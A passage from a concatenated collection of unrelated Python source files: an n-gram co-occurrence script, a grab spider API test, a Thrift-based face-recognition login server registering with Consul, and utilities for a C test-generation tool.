negWordPath = pars[6]
negReg = getNegWords(negWordPath)
baseWords = getWords(baseWordPath)
targetWords = getWords(targetWordPath)
print('Calculating n-gram cooccurrence with parameters:\n{0}\n{1}\n{2}\n{3}\n{4}\n{5}\n{6}'.format(ngram_path,
nJobs,
output_dir,
baseWordPath,
targetWordPath,
baseWords,
targetWords))
if coType == '1':
print 'Cooccurrence search based on pattern matching (type 1)'
elif coType == '2':
print 'Cooccurrence search based on exact matching (type 2)'
elif coType == '3':
print 'Cooccurrence search based on exact matching with negation exclusion (type 3)'
print 'Negation words: {0}'.format(negWords)
ngram_files = sorted(getFiles(ngram_path=ngram_path))
ngram_chunks = chunks(ngram_files, nJobs=nJobs)
jobN = 0
output_paths = []
output_dir = output_dir
jobs = []
for chunk in ngram_chunks:
jobN += 1
out_path = output_dir + '/job_' + str(jobN) + '_dict.pickle'
output_paths.append(out_path)
if coType == '1':
p = multiprocessing.Process(target=chunkGrams1, args=(chunk,baseWords,targetWords,out_path,ngram_path,))
if coType == '2':
p = multiprocessing.Process(target=chunkGrams2, args=(chunk, baseWords, targetWords, out_path, ngram_path,))
if coType == '3':
p = multiprocessing.Process(target=chunkGrams3, args=(chunk, baseWords, targetWords, out_path, ngram_path,negReg,))
jobs.append(p)
for p in jobs:
p.start()
for p in jobs:
print 'Joining {0} thread'.format(p)
p.join()
return(output_paths)
def getGnDicts(output_paths, ngramSyntax):
"""This function combines the objects saved by the main() function and also
downloads and combines total ngram counts.
"""
pars = []
with open(ngramSyntax, 'rb') as ngs:
for line in ngs:
pars.append(line.replace('\n', '').strip())
output_dir = pars[2]
ngramFreqDicts = []
ngramVolDicts = []
for dicPath in output_paths:
dic = dill.load(open(dicPath, 'rb'))
ngramFreqDicts.append(dic[0])
ngramVolDicts.append(dic[1])
ngramFreqs = mergeDicts(ngramFreqDicts)
ngramFreqsDf = pd.DataFrame.from_dict(ngramFreqs, orient='index')
ngramVols = mergeDicts(ngramVolDicts)
ngramVolsDf = pd.DataFrame.from_dict(ngramVols, orient='index')
url="http://storage.googleapis.com/books/ngrams/books/googlebooks-eng-all-totalcounts-20120701.txt"
gnTotals = gnTotal(url)
gnTotals.set_index('year', inplace=True)
ngramFreqsDf = pd.concat([gnTotals, ngramFreqsDf], axis=1)
ngramVolsDf = pd.concat([gnTotals, ngramVolsDf], axis=1)
print 'Writing Frequencies to: {0}'.format(output_dir + '/ngramFreqsDf.csv')
ngramFreqsDf.to_csv(output_dir + '/ngramFreqsDf.csv', sep=',')
print 'Writing Volumes to: {0}'.format(output_dir + '/ngramVolsDf.csv')
ngramVolsDf.to_csv(output_dir + '/ngramVolsDf.csv', sep=',')
if __name__ == '__main__':
output_paths = main(ngramSyntax = sys.argv[1])
getGnDicts(output_paths=output_paths, ngramSyntax=sys.argv[1]) |
spider_http_api.py | from threading import Thread
import socket
import time
from six.moves.urllib.request import urlopen
from grab.spider import Spider, Task
from tests.util import BaseGrabTestCase, build_spider
class BasicSpiderTestCase(BaseGrabTestCase):
def setUp(self):
self.server.reset()
def get_open_port(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(("", 0))
sock.listen(1)
port = sock.getsockname()[1]
sock.close()
return port
def test_spider(self):
class SimpleSpider(Spider):
def task_page(self, grab, unused_task):
pass
api_port = self.get_open_port()
bot = build_spider(
SimpleSpider, http_api_port=api_port,
)
bot.setup_queue()
bot.add_task(Task('page', url=self.server.get_url(),
delay=1))
def worker():
bot.run()
th = Thread(target=worker) # pylint: disable=invalid-name
th.daemon = True
th.start()
time.sleep(0.5)
data = urlopen('http://localhost:%d' % api_port).read()
self.assertTrue(b'<title>Grab Api</title>' in data)
|
PythonEyePiServer.py | #!/usr/bin/env python
import sys
import consul
import signal
from multiprocessing.managers import SyncManager
sys.path.append('src/gen-py')
from connect.PythonFacePiClient import FacePiThriftClient
from connect.GenericThriftClient import GenericThriftClient
from connect.LongTermPersonMemoryClient import LongTermPersonMemoryClient
from connect.ShortTermLogMemoryClient import ShortTermLogMemoryClient
from connect.ShortTermTokenMemoryClient import ShortTermTokenMemoryClient
from EyePi import EyePiThriftService
from EyePi.ttypes import LoginOutputObject
from EyePi.ttypes import EyePiInput
from EyePi.ttypes import EyePiOutput
from ThriftException.ttypes import BadHashException
from ThriftException.ttypes import LoginFailedException
from ThriftException.ttypes import ExternalEndpointUnavailable
from ThriftException.ttypes import ThriftServiceException
from GenericStruct.ttypes import ActionEnum
from thrift.transport import TSocket
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
from thrift.server import TServer
sys.path.append('../../')
import pickle
import config
import logging
import random
import threading
import statsd
stat = statsd.StatsClient(config.statsd_ip, config.statsd_port)
port = random.randint(58820, 58830)
log = logging.getLogger()
log.setLevel(logging.DEBUG)
class EyePiThriftHandler:
def __init__(self):
self.log = {}
@stat.timer("EyePi.login")
def login(self, loginObject):
try:
output = LoginOutputObject()
if not loginObject.deviceInput and not loginObject.deviceToken:
return output
person = LongTermPersonMemoryClient().loginCall(loginObject)
if person:
output.uniquename = person.uniquename
output.details = person.details
output.autorisations = person.autorisations
if not person:
return output
if loginObject.deviceToken is not None:
output.deviceToken = loginObject.deviceToken
if ShortTermTokenMemoryClient().validateDeviceToken(loginObject.deviceToken):
output.token = self.__get_request_token(uniquename=person.uniquename, deviceToken=loginObject.deviceToken)
else:
loginObject.deviceInput.person = person.uniquename
deviceToken = ShortTermTokenMemoryClient().register_device(loginObject.deviceInput)
output.deviceToken = deviceToken
return output
except BadHashException as badHash:
# ShortTermLogMemoryClient().log_thrift_exception(loginObject, badHash)
raise badHash
except LoginFailedException as fail:
# ShortTermLogMemoryClient().log_thrift_exception(loginObject, fail)
raise fail
@staticmethod
def __get_request_token(uniquename, deviceToken):
eyeInput = EyePiInput()
actions = dict()
actions[ActionEnum.LOGIN] = pickle.dumps(obj=uniquename, protocol=None, fix_imports=False)
eyeInput.action = actions
eyeInput.person = uniquename
eyeInput.deviceToken = deviceToken
return ShortTermTokenMemoryClient().getToken(eyeInput)
@stat.timer("EyePi.handleRequest")
def handleRequest(self, input):
try:
ShortTermLogMemoryClient().log_event(input, message='start eyepi')
eyeOutput = EyePiOutput()
tokenValide = True
if input.token:
tokenValide = ShortTermTokenMemoryClient().validateToken(input.token, input.deviceToken)
eyeOutput.ok = tokenValide
if input.image and tokenValide:
eyeOutput.ok = False
eyeOutput.personCollection = []
facePiOutput = FacePiThriftClient().handle_request(input.image)
for face in facePiOutput:
name = face.person
person = LongTermPersonMemoryClient().get_Person(input=name)
if person:
if person.enabled:
eyeOutput.personCollection += face
# eyeOutput.personCollection = facePiOutput
if eyeOutput.personCollection:
eyeOutput.ok = True
if eyeOutput.ok:
eyeOutput.token = ShortTermTokenMemoryClient().getToken(input)
eyeOutput.data = self.__make_generic_call(input.action)
return eyeOutput
except ThriftServiceException as tex:
ShortTermLogMemoryClient().log_thrift_exception(input, tex)
raise tex
except ExternalEndpointUnavailable as endEx:
ShortTermLogMemoryClient().log_thrift_endpoint_exception(input, endEx)
raise endEx
except Exception as ex:
ShortTermLogMemoryClient().log_exception(input, ex)
print('invalid request %s' % ex)
raise ThriftServiceException('EyePi', 'invalid request %s' % ex)
@staticmethod
def __make_generic_call(input):
threads = [None] * len(ActionEnum._VALUES_TO_NAMES)
call_result = [{}] * len(ActionEnum._VALUES_TO_NAMES)
for key, request in input.items():
try:
threads[key] = threading.Thread(target=GenericThriftClient().handle_request, args=(key, request, call_result))
threads[key].start()
# return GenericThriftClient().handle_request(key, request.actionParameters)
except Exception as ex:
print('test')
print('%s' % ex)
except Thrift.TException as tx:
print('test')
print('%s' % tx.message)
raise tx
except ThriftServiceException as tex:
raise tex
except ExternalEndpointUnavailable as endEx:
raise endEx
# probably try again
for key in input:
threads[key].join()
output = {}
for key in range(len(call_result)):
value = call_result[key]
if value:
output[key] = value
# output = {**output, **i}
return output
@stat.timer("EyePi.confimFace")
def confimFace(self, input):
FacePiThriftClient.confim_face(self, input)
@stat.timer("EyePi.writeLog")
def writeLog(self, input):
ShortTermLogMemoryClient().log_event(input, message='start eyepi')
@stat.timer("EyePi.ping")
def ping(self, input):
print(input)
def get_ip():
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('255.255.255.255', 1)) # isn't reachable intentionally
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
def create_server():
handler = EyePiThriftHandler()
return TServer.TSimpleServer(
EyePiThriftService.Processor(handler),
TSocket.TServerSocket(port=port),
TTransport.TBufferedTransportFactory(),
TBinaryProtocol.TBinaryProtocolFactory()
)
def register():
log.info("register started")
c = consul.Consul(host=config.consul_ip, port=config.consul_port)
check = consul.Check.tcp(host=get_ip(), port=port, interval=config.consul_interval,
timeout=config.consul_timeout, deregister=unregister())
c.agent.service.register(name="eye-pi", service_id="eye-pi-%d" % port, port=port, check=check)
log.info("services: " + str(c.agent.services()))
def unregister():
log.info("unregister started")
c = consul.Consul(host=config.consul_ip, port=config.consul_port)
c.agent.service.deregister("eye-pi-%d" % port)
c.agent.service.deregister("eye-pi")
log.info("services: " + str(c.agent.services()))
def interupt_manager():
signal.signal(signal.SIGINT, signal.SIG_IGN)
def main(args=None):
manager = SyncManager()
manager.start(interupt_manager)
try:
server = create_server()
register()
server.serve()
finally:
unregister()
print('finally EyePi shutting down')
manager.shutdown()
if __name__ == '__main__':
main()
|
utils.py | import logging
import subprocess
import os
import hashlib
import tempfile
import pycparser
import re
from struct import unpack
import codecs
import shutil
from math import floor
import threading
import time
class MachineModel(object):
def __init__(self, wordsize, name, short_size, int_size, long_size,
long_long_size, float_size, double_size, long_double_size,
compile_param):
assert wordsize == 32 or wordsize == 64
self._wordsize = wordsize
self._name = name
self.model = {
'short': short_size,
'int': int_size,
'long': long_size,
'long long': long_long_size,
'float': float_size,
'double': double_size,
'long double': long_double_size
}
self._compile_param = compile_param
@property
def short_size(self):
return self.model['short']
@property
def int_size(self):
return self.model['int']
@property
def long_size(self):
return self.model['long']
@property
def long_long_size(self):
return self.model['long long']
@property
def float_size(self):
return self.model['float']
@property
def double_size(self):
return self.model['double']
@property
def long_double_size(self):
return self.model['long double']
@property
def compile_parameter(self):
return self._compile_param
@property
def is_64(self):
return self._wordsize == 64
@property
def is_32(self):
return self._wordsize == 32
@property
def name(self):
return self._name
def get_size(self, data_type):
if 'short' in data_type:
return self.short_size
elif 'long long' in data_type:
return self.long_long_size
elif 'long double' in data_type:
return self.long_double_size
elif 'long' in data_type:
return self.long_size
elif 'double' in data_type:
return self.double_size
elif 'float' in data_type:
return self.float_size
elif 'int' in data_type:
return self.int_size
else:
raise AssertionError("Unhandled data type: " + data_type)
def __str__(self):
return "%sbit" % self._wordsize
class TestCase(object):
def __init__(self, name, origin_file, content):
self._name = name
self._origin = os.path.abspath(origin_file)
self._content = content
@property
def name(self):
return self._name
@property
def origin(self):
return self._origin
@property
def content(self):
return self._content
def __str__(self):
return self.name + "(" + self.origin + ")"
class TestVector(object):
"""Test vector.
Consists of a unique name, the original file that
describes the test vector,
and the vector as a sequence of test inputs.
Each test input is a dictionary and consists
of a 'value' and a 'name'.
"""
def __init__(self, name, origin_file):
self.name = name
self.origin = origin_file
self._vector = list()
def add(self, value, method=None):
self._vector.append({'value': value, 'name': method})
@property
def vector(self):
"""The sequence of test inputs of this test vector.
Each element of this sequence is a dict
and consists of two entries: 'value' and 'name'.
The 'value' entry describes the input value, as it should be given
to the program as input.
The 'name' entry describes the program input method
through which the value is retrieved. The value of this entry may be None.
"""
return self._vector
def __len__(self):
return len(self.vector)
def __str__(self):
return self.origin + " (" + str(self.vector) + " )"
class ConfigError(Exception):
def __init__(self, msg=None, cause=None):
self.msg = msg
self.cause = cause
class InputGenerationError(Exception):
def __init__(self, msg=None, cause=None):
self.msg = msg
self.cause = cause
class ParseError(Exception):
def __init__(self, msg=None, cause=None):
self.msg = msg
self.cause = cause
class CompileError(Exception):
def __init__(self, msg=None, cause=None):
self.msg = msg
self.cause = cause
class ExecutionResult(object):
"""Results of a subprocess execution."""
def __init__(self, returncode, stdout, stderr):
self._returncode = returncode
self._stdout = stdout
self._stderr = stderr
@property
def returncode(self):
return self._returncode
@property
def stdout(self):
return self._stdout
@property
def stderr(self):
return self._stderr
class Verdict(object):
"""Results of a test validation, test execution or klee-replay currently."""
def __init__(self, verdict, test=None, test_vector=None, harness=None):
self.verdict = verdict
self.test = test
self.test_vector = test_vector
self.harness = harness
def is_positive(self):
"""
Returns whether the verdict is positive, i.e., whether a target was found.
:return: true if the verdict represents that a target was found, false otherwise
"""
return self.verdict == FALSE
def __str__(self):
return self.verdict
class VerdictTrue(Verdict):
def __init__(self):
super().__init__(TRUE)
class VerdictFalse(Verdict):
def __init__(self, test_origin, test_vector=None, harness=None):
super().__init__(FALSE, test_origin, test_vector, harness)
class VerdictUnknown(Verdict):
def __init__(self):
super().__init__(UNKNOWN)
def set_stop_timer(timelimit, stop_event):
timewatcher = threading.Timer(timelimit, stop_event.set)
timewatcher.start()
def execute(command,
quiet=False,
env=None,
err_to_output=True,
stop_flag=None,
input_str=None,
timelimit=None,
show_output=False):
def wait_and_terminate(timelimit, stop_flag, process):
def shut_down(process):
process.kill()
returncode = process.wait()
return returncode
if timelimit:
stopwatch = Stopwatch()
stopwatch.start()
returncode = process.poll()
while returncode is None:
if (stop_flag and stop_flag.is_set()) \
or (timelimit and stopwatch.curr_s() > timelimit):
logging.info("Timeout of %ss expired or told to stop. Killing process.", timelimit if timelimit else "- ")
returncode = shut_down(process)
else:
time.sleep(0.001)
returncode = process.poll()
log_cmd = logging.debug if quiet else logging.info
if env:
logging.debug("PATH=%s", env['PATH'])
logging.debug(
"LD_LIBRARY_PATH=%s",
env['LD_LIBRARY_PATH'] if 'LD_LIBRARY_PATH' in env else "[]")
log_cmd(" ".join(command))
p = subprocess.Popen(
command,
stdin=subprocess.PIPE if input_str else None,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT if err_to_output else subprocess.PIPE,
universal_newlines=False,
env=env)
waiter = threading.Thread(target=wait_and_terminate, args=(timelimit, stop_flag, p))
waiter.start()
if input_str and type(input_str) is not bytes:
input_str = input_str.encode()
output, err_output = p.communicate(input=input_str)
returncode = p.poll()
try:
output = output.decode() if output else ''
except UnicodeDecodeError:
pass
try:
err_output = err_output.decode() if err_output else ''
except UnicodeDecodeError:
pass
log_output = logging.info if show_output else logging.debug
if output:
log_output(output)
if err_output:
log_output(err_output)
return ExecutionResult(returncode, output, err_output)
def get_executable(exec):
"""
Returns the full path to the given executable.
If the executable does not exist, None is returned.
"""
return shutil.which(exec)
def get_output_path(filename):
return os.path.join(OUTPUT_DIR, filename)
def create_temp():
return tempfile.mkdtemp(prefix='tbf_')
def get_env():
return os.environ.copy()
def add_ld_path_to_env(env, lib_dir):
new_ld_path = [str(lib_dir)]
if 'LD_LIBRARY_PATH' in env:
if type(env['LD_LIBRARY_PATH']) is list:
new_ld_path = new_ld_path + env['LD_LIBRARY_PATH']
else:
new_ld_path = new_ld_path + [env['LD_LIBRARY_PATH']]
new_env = env.copy()
new_env['LD_LIBRARY_PATH'] = ':'.join(new_ld_path)
return new_env
def get_env_with_path_added(path_addition):
env = os.environ.copy()
env['PATH'] = path_addition + os.pathsep + env['PATH']
return env
def get_assume_method():
return 'void __VERIFIER_assume(int cond) {\n if(!cond) {\n abort();\n }\n}\n'
def get_error_method_definition(error_method):
return 'void ' + error_method + '() {{ fprintf(stderr, \"{0}\\n\"); exit(1); }}\n'.format(
ERROR_STRING)
def get_method_head(method_name, method_type, param_types):
method_head = '{0} {1}('.format(method_type, method_name)
params = list()
for (idx, pt) in enumerate(param_types):
if '...' in pt:
params.append('...')
elif pt != 'void':
if '{}' not in pt:
pt += " {}"
params.append(pt.format("param{}".format(idx)))
elif params:
raise AssertionError("Void type parameter in method " + method_name)
method_head += ', '.join(params)
method_head += ')'
return method_head
class Stopwatch(object):
def __init__(self):
self._intervals = list()
self._current_start = None
def start(self):
assert not self._current_start
# We have to count sleep time because of other processes we wait on!
self._current_start = time.perf_counter()
def stop(self):
end_time = time.perf_counter()
assert self._current_start
time_elapsed = self._process(end_time - self._current_start)
self._current_start = None
self._intervals.append(time_elapsed)
def is_running(self):
return self._current_start is not None
def curr_s(self):
""" Return current time in seconds """
assert self._current_start
return int(
floor(self._process(time.perf_counter() - self._current_start)))
def _process(self, value):
return round(value, 3)
def sum(self):
val = sum(self._intervals) if self._intervals else 0
return self._process(val)
def avg(self):
val = sum(self._intervals) / len(self._intervals) if len(
self._intervals) else 0
return self._process(val)
def min(self):
val = min(self._intervals) if self._intervals else 0
return self._process(val)
def max(self):
val = max(self._intervals) if self._intervals else 0
return self._process(val)
def __str__(self):
str_rep = "{0} (s)".format(self.sum())
if len(self._intervals) > 1:
str_rep += " (Avg.: {0} s, Min.: {1} s, Max.: {2} s)".format(
self.avg(), self.min(), self.max())
return str_rep
def _rewrite_cproblems(content):
need_struct_body = False
skip_asm = False
in_attribute = False
in_cxx_comment = False
prepared_content = ''
for line in [c + "\n" for c in content.split('\n')]:
# remove C++-style comments
if in_cxx_comment:
if re.search(r'\*/', line):
line = re.sub(r'.*\*/', '', line)
in_cxx_comment = False
else:
line = ''
else:
line = re.sub(r'/\*.*?\*/', '', line)
if re.search(r'/\*', line):
line = re.sub(r'/\*.*', '', line)
in_cxx_comment = True
# remove __attribute__
line = re.sub(r'__attribute__\s*\(\(\s*[a-z_, ]+\s*\)\)\s*', '', line)
# line = re.sub(r'__attribute__\s*\(\(\s*[a-z_, ]+\s*\(\s*[a-zA-Z0-9_, "\.]+\s*\)\s*\)\)\s*', '', line)
# line = re.sub(r'__attribute__\s*\(\(\s*[a-z_, ]+\s*\(\s*sizeof\s*\([a-z ]+\)\s*\)\s*\)\)\s*', '', line)
# line = re.sub(r'__attribute__\s*\(\(\s*[a-z_, ]+\s*\(\s*\([0-9]+\)\s*<<\s*\([0-9]+\)\s*\)\s*\)\)\s*', '', line)
line = re.sub(r'__attribute__\s*\(\(.*\)\)\s*', '', line)
if re.search(r'__attribute__\s*\(\(', line):
line = re.sub(r'__attribute__\s*\(\(.*', '', line)
in_attribute = True
elif in_attribute:
line = re.sub(r'.*\)\)', '', line)
in_attribute = False
# rewrite some GCC extensions
line = re.sub(r'__extension__', '', line)
line = re.sub(r'__restrict', '', line)
line = re.sub(r'__restrict__', '', line)
line = re.sub(r'__inline__', '', line)
line = re.sub(r'__inline', '', line)
line = re.sub(r'__const', 'const', line)
line = re.sub(r'__signed__', 'signed', line)
line = re.sub(r'__builtin_va_list', 'int', line)
# a hack for some C-standards violating code in LDV benchmarks
if need_struct_body and re.match(r'^\s*}\s*;\s*$', line):
line = 'int __dummy; ' + line
need_struct_body = False
elif need_struct_body:
need_struct_body = re.match(r'^\s*$', line) is not None
elif re.match(r'^\s*struct\s+[a-zA-Z0-9_]+\s*{\s*$', line):
need_struct_body = True
# remove inline asm
if re.match(r'^\s*__asm__(\s+volatile)?\s*\("([^"]|\\")*"[^;]*$', line):
skip_asm = True
elif skip_asm and re.search(r'\)\s*;\s*$', line):
skip_asm = False
line = '\n'
if (skip_asm or re.match(
r'^\s*__asm__(\s+volatile)?\s*\("([^"]|\\")*"[^;]*\)\s*;\s*$',
line)):
line = '\n'
# remove asm renaming
line = re.sub(r'__asm__\s*\(""\s+"[a-zA-Z0-9_]+"\)', '', line)
prepared_content += line
return prepared_content
def parse_file_with_preprocessing(file_content, machine_model, includes=()):
preprocessed_content = preprocess(file_content, machine_model, includes)
preprocessed_content = _rewrite_cproblems(preprocessed_content)
parser = pycparser.CParser()
ast = parser.parse(preprocessed_content)
return ast
def preprocess(file_content, machine_model, includes=()):
mm_arg = machine_model.compile_parameter
# -E : only preprocess
# -o : output file name
# -xc : Use C language
# - : Read code from stdin
preprocess_cmd = ['gcc', '-E', '-xc', mm_arg]
for inc in includes:
preprocess_cmd += ['-I', inc]
final_cmd = preprocess_cmd + ['-std=gnu11', '-lm', '-']
p = execute(
final_cmd, err_to_output=False, input_str=file_content, quiet=False)
if p.returncode != 0:
final_cmd = preprocess_cmd + ['-std=gnu90', '-lm', '-']
p = execute(
final_cmd, err_to_output=False, input_str=file_content, quiet=False)
return p.stdout
def find_nondet_methods(filename, svcomp_only, excludes=None):
logging.debug("Finding undefined methods")
with open(filename, 'r') as inp:
file_content = inp.read()
if not svcomp_only:
try:
undefined_methods = _find_undefined_methods(file_content, excludes)
except pycparser.plyparser.ParseError as e:
logging.warning("Parse failure with pycparser while parsing: %s", e)
undefined_methods = _find_nondet_methods(file_content, excludes)
else:
undefined_methods = _find_nondet_methods(file_content, excludes)
logging.debug("Undefined methods: %s", undefined_methods)
return undefined_methods
def _find_undefined_methods(file_content, excludes):
import tbf.ast_visitor as ast_visitor
ast = parse_file_with_preprocessing(file_content, MACHINE_MODEL_32)
func_decl_collector = ast_visitor.FuncDeclCollector()
func_def_collector = ast_visitor.FuncDefCollector()
func_decl_collector.visit(ast)
function_declarations = func_decl_collector.func_decls
func_def_collector.visit(ast)
function_definitions = [f.name for f in func_def_collector.func_defs]
function_definitions += IMPLICIT_FUNCTIONS
if excludes:
function_definitions += excludes
undef_func_prepared = [
f for f in function_declarations
if ast_visitor.get_name(f) not in function_definitions
]
undef_func_prepared = [_prettify(f) for f in undef_func_prepared]
# List every undefined, but declared function only once.
# This is necessary because there are a few SV-COMP programs that declare
# functions multiple times.
undef_func_names = set()
undefined_functions = list()
for f in undef_func_prepared:
if f['name'] and f['name'] not in undef_func_names:
undef_func_names.add(f['name'])
undefined_functions.append(f)
return undefined_functions
def _find_nondet_methods(file_content, excludes):
if os.path.exists(file_content):
with open(file_content, 'r') as inp:
content = inp.read()
else:
content = file_content
nondet_pattern = re.compile('__VERIFIER_nondet_.+?\(\)')
method_names = set([
s[:-2]
for s in nondet_pattern.findall(content)
if s[:-2] not in excludes
])
functions = list()
for method_name in method_names:
method_type = _get_return_type(method_name)
functions.append({
'name': method_name,
'type': method_type,
'params': []
})
svcomp_error_name = '__VERIFIER_error'
if svcomp_error_name not in excludes:
functions.append({'name': '__VERIFIER_error', 'type': 'void', 'params': []})
return functions
def _get_return_type(verifier_nondet_method):
assert verifier_nondet_method.startswith('__VERIFIER_nondet_')
assert verifier_nondet_method[-2:] != '()'
m_type = verifier_nondet_method[len('__VERIFIER_nondet_'):].lower()
if m_type == 'bool':
m_type = '_Bool'
elif m_type == 'u32':
m_type = 'unsigned int'
elif m_type == 'u16':
m_type = 'unsigned short'
elif m_type == 'u8':
m_type = 'unsigned char'
elif m_type == 'unsigned': # unsigned is a synonym for unsigned int, so recall the method with that
m_type = 'unsigned int'
elif m_type[0] == 'u': # resolve uint to unsigned int (e.g.)
m_type = 'unsigned ' + m_type[1:]
elif m_type == 'pointer':
m_type = 'void *'
elif m_type == 'pchar':
m_type = 'char *'
elif m_type == 's8':
m_type = 'char'
return m_type
def _prettify(func_def):
import tbf.ast_visitor as ast_visitor
name = ast_visitor.get_name(func_def)
return_type = ast_visitor.get_type(func_def.type)
params = list()
if func_def.args:
for parameter in func_def.args.params:
param_type = ast_visitor.get_type(parameter)
params.append(param_type)
return {'name': name, 'type': return_type, 'params': params}
def get_sym_var_name(method_name):
name = SYM_VAR_PREFIX + method_name
logging.debug("Getting sym var name for method %s: %s", method_name, name)
return name
def get_corresponding_method_name(sym_var_name):
name = sym_var_name[len(SYM_VAR_PREFIX):]
logging.debug("Getting method name for %s: %s", sym_var_name, name)
return name
class Counter(object):
def __init__(self):
self._count = 0
@property
def count(self):
return self._count
def inc(self, amount=1):
self._count += amount
def __str__(self):
return str(self.count)
class Constant(object):
def __init__(self, value=None):
self.value = value
def __str__(self):
return str(self.value)
class Statistics(object):
def __init__(self, title):
self._title = title
self._stats = list()
@property
def title(self):
return self._title
def add_value(self, property, value):
assert property not in [p for (p, v) in self._stats]
self._stats.append((property, value))
@property
def stats(self):
return self._stats
def __str__(self):
str_rep = '---- ' + self._title + ' ----\n'
str_rep += '\n'.join([p + ': ' + str(v) for (p, v) in self._stats])
return str_rep
class StatisticsPool(object):
def __init__(self):
self._stat_objects = list()
@property
def stats(self):
return self._stat_objects
def new(self, title):
stat = Statistics(title)
self._stat_objects.append(stat)
return stat
def __str__(self):
return '\n\n'.join([str(s) for s in self._stat_objects])
def found_err(run_result):
if isinstance(run_result.stderr, bytes):
err_out = run_result.stderr.decode()
else:
err_out = run_result.stderr
return run_result.stderr and ERROR_STRING in err_out
def get_prepared_name(filename, tool_name):
return '.'.join(
os.path.basename(filename).split('.')[:-1] + [tool_name, 'c'])
def provide_directory(directory):
if os.path.exists(directory):
# despite the name, ignore_errors=True allows removal of non-empty directories
shutil.rmtree(directory, ignore_errors=True)
os.mkdir(directory)
return directory
def get_error_spec(error_method):
return "COVER(init(main()), FQL(COVER EDGES( @ CALL(%s))) )" % error_method
def get_coverage_spec():
return "COVER( init(main()), FQL(COVER EDGES(@BASICBLOCKENTRY)) )"
SYM_VAR_PREFIX = '__sym_'
ERROR_STRING = "Error found."
OUTPUT_DIR = os.path.abspath('./output')
FALSE = 'FALSE'
UNKNOWN = 'UNKNOWN'
TRUE = 'TRUE'
ERROR = 'ERROR'
DONE = 'DONE'
MACHINE_MODEL_32 = MachineModel(32, "32 bit linux", 2, 4, 4, 8, 4, 8, 12,
'-m32')
MACHINE_MODEL_64 = MachineModel(64, "64 bit linux", 2, 4, 8, 8, 4, 8, 16,
'-m64')
if not os.path.exists(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
EXTERNAL_DECLARATIONS = """
struct _IO_FILE;
typedef struct _IO_FILE FILE;
extern struct _IO_FILE *stdin;
extern struct _IO_FILE *stderr;
typedef long unsigned int size_t;
extern void abort (void) __attribute__ ((__nothrow__ , __leaf__))
__attribute__ ((__noreturn__));
extern void exit (int __status) __attribute__ ((__nothrow__ , __leaf__))
__attribute__ ((__noreturn__));
extern char *fgets (char *__restrict __s, int __n, FILE *__restrict __stream);
extern int sscanf (const char *__restrict __s,
const char *__restrict __format, ...) __attribute__ ((__nothrow__ , __leaf__));
extern size_t strlen (const char *__s)
__attribute__ ((__nothrow__ , __leaf__))
__attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1)));
extern int fprintf (FILE *__restrict __stream,
const char *__restrict __format, ...);
extern void *malloc (size_t __size) __attribute__ ((__nothrow__ , __leaf__))
__attribute__ ((__malloc__));
extern void *memcpy (void *__restrict __dest, const void *__restrict __src,
size_t __n) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
"""
GCC_BUILTINS = [
'cos',
'sin',
'tan',
'acos',
'asin',
'atan',
'atan2',
'cosh',
'sinh',
'tanh',
'acosh',
'asinh',
'atanh',
'exp',
'frexp',
'ldexp',
'log',
'log10',
'modf',
'exp2',
'expm1',
'iologb',
'log1p',
'log2',
'logb',
'scalbn',
'scalbln',
'pow',
'sqrt',
'cbrt',
'hypot',
'erf',
'erfc',
'tgamma',
'lgamma',
'ceil',
'floor',
'fmod',
'trunc',
'round',
'lround',
'llround',
'rint',
'lrint',
'nearbyint',
'remainder',
'remquo',
'copysing',
'nan',
'nanf',
'nanl',
'nextafter',
'nettoward',
'fdim',
'fmax',
'fmal',
'fmin',
'fabs',
'abs',
'fma',
'fpclassify',
'fpclassifyf',
'fpclassifyl',
'isfinite',
'isfinitef',
'isfinitel',
'finite',
'finitef',
'finitel',
'isinf',
'isinff',
'isinfl',
'isnan',
'isnanf',
'isnanl',
'isnormal',
'signbit',
'signbitf',
'signbitl',
'isgreater',
'isgreaterequal',
'isless',
'islessequal',
'islessgreater',
'isunordered',
'_Exit',
'acoshf',
'acoshl',
'acosh',
'asinhf',
'asinhl',
'asinh',
'atanhf',
'atanhl',
'atanh',
'cabsf',
'cabsl',
'cabs',
'cacosf',
'cacoshf',
'cacoshl',
'cacosh',
'cacosl',
'cacos',
'cargf',
'cargl',
'carg',
'casinf',
'casinhf',
'casinhl',
'casinh',
'casinl',
'casin',
'catanf',
'catanhf',
'catanhl',
'catanh',
'catanl',
'catan',
'cbrtf',
'cbrtl',
'cbrt',
'ccosf',
'ccoshf',
'ccoshl',
'ccosh',
'ccosl',
'ccos',
'cexpf',
'cexpl',
'cexp',
'cimagf',
'cimagl',
'cimag',
'clogf',
'clogl',
'clog',
'conjf',
'conjl',
'conj',
'copysignf',
'copysignl',
'copysign',
'cpowf',
'cpowl',
'cpow',
'cprojf',
'cprojl',
'cproj',
'crealf',
'creall',
'creal',
'csinf',
'csinhf',
'csinhl',
'csinh',
'csinl',
'csin',
'csqrtf',
'csqrtl',
'csqrt',
'ctanf',
'ctanhf',
'ctanhl',
'ctanh',
'ctanl',
'ctan',
'erfcf',
'erfcl',
'erfc',
'erff',
'erfl',
'erf',
'exp2f',
'exp2l',
'exp2',
'expm1f',
'expm1l',
'expm1',
'fdimf',
'fdiml',
'fdim',
'fmaf',
'fmal',
'fmaxf',
'fmaxl',
'fmax',
'fma',
'fminf',
'fminl',
'fmin',
'hypotf',
'hypotl',
'hypot',
'ilogbf',
'ilogbl',
'ilogb',
'imaxabs',
'isblank',
'iswblank',
'lgammaf',
'lgammal',
'lgamma',
'llabs',
'llrintf',
'llrintl',
'llrint',
'llroundf',
'llroundl',
'llround',
'log1pf',
'log1pl',
'log1p',
'log2f',
'log2l',
'log2',
'logbf',
'logbl',
'logb',
'lrintf',
'lrintl',
'lrint',
'lroundf',
'lroundl',
'lround',
'nearbyintf',
'nearbyintl',
'nearbyint',
'nextafterf',
'nextafterl',
'nextafter',
'nexttowardf',
'nexttowardl',
'nexttoward',
'remainderf',
'remainderl',
'remainder',
'remquof',
'remquol',
'remquo',
'rintf',
'rintl',
'rint',
